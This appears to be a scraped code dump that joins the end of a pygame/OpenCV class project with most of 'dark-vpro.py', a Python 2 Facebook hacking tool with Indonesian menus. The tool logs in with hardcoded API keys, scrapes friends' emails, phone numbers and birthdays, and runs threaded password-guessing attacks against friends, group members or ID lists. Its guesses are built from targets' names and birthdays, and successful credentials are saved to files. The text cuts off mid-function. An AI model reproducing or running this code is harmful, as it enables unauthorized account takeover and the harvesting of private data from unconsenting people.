        self.is_pressed = is_pressed
        self.key = key
class MouseController:
""" Checks for user input from clicking the mouse in order to click on
buttons.
Attributes:
is_pressed: boolean indicating whether the left mouse button is pressed
x_pos: the x-coordinate of the location on the screen where the mouse
was clicked
y_pos: the y-coordinate of the location on the screen where the mouse
was clicked
"""
def __init__(self, is_pressed, x_pos, y_pos):
""" Assigns provided parameters to a new MouseController object. The
attributes of this object will be checked within FinalProject_Model to
allow the users to navigate the menu pages.
"""
        self.is_pressed = is_pressed
        self.x_pos = x_pos
        self.y_pos = y_pos
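# A minimal usage sketch (assumption: FinalProject_Model builds these objects from
# pygame events; the event loop below is illustrative only):
#
#     for event in pygame.event.get():
#         if event.type in (pygame.KEYDOWN, pygame.KEYUP):
#             kb = KeyboardController(event.type == pygame.KEYDOWN, event.key)
#         elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
#             mouse = MouseController(True, *event.pos)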
if __name__ == "__main__":
#testing code before moving into main model file
camera = ImageController()
camera.create_trackbars()
pygame.init()
camera.resizeFrame = False
if camera.resizeFrame:
pygame_screen_width, pygame_screen_height = camera.get_resized_frame_size(16,9)
else:
pygame_screen_width, pygame_screen_height = camera.width, camera.height
screen = pygame.display.set_mode([pygame_screen_width, pygame_screen_height])
running = True
while running:
screen.fill((255, 255, 255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
try:
camera.create_hsv_mask()
camera.detect_rectangle()
camera.show_frames()
except AttributeError:
pass
# display pygame graphics
pygame.display.flip()
screen.fill((255, 255, 255))
#press escape key to end
key = cv2.waitKey(1)
        if key == 27:
            running = False
            camera.end_capture()
|
dark-vpro.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;97m█████████\n \x1b[1;97m█▄█████▄█ \x1b[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;97m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;97m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mREVISI JAY\n \x1b[1;97m█████████ \x1b[1;96m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m MR.F0RB1D3N (JAY) \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \1;91m:https://github.com/MrFORBIDEN/ \x1b[1;92m \x1b[92mx1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m083820016316\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n[*] KALO ADA BUG LAPOR KE email [email protected]\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCpVqkAi_sqVf-ZPwzRjME0Q')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
